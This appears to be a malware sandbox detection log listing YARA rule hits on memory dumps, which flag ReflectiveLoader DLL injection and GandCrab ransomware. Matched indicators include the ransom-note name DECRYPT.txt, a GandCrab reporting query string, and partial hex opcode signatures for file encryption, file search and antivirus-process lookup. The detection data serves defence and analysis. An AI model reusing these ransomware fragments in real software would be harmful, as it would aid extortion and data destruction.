0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000017.00000002.472905613.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000025.00000000.650224978.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000F.00000000.366415830.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001A.00000002.502804269.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000023.00000002.638106882.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000E.00000000.345391884.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000017.00000000.455550683.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000010.00000000.384391365.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000010.00000002.406139264.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000026.00000002.678365276.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000C.00000000.326861802.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000026.00000000.674598119.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000024.00000000.631210947.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001C.00000002.559852565.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000022.00000002.593533053.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000013.00000002.436990656.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000027.00000002.720225413.000000000F58A000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
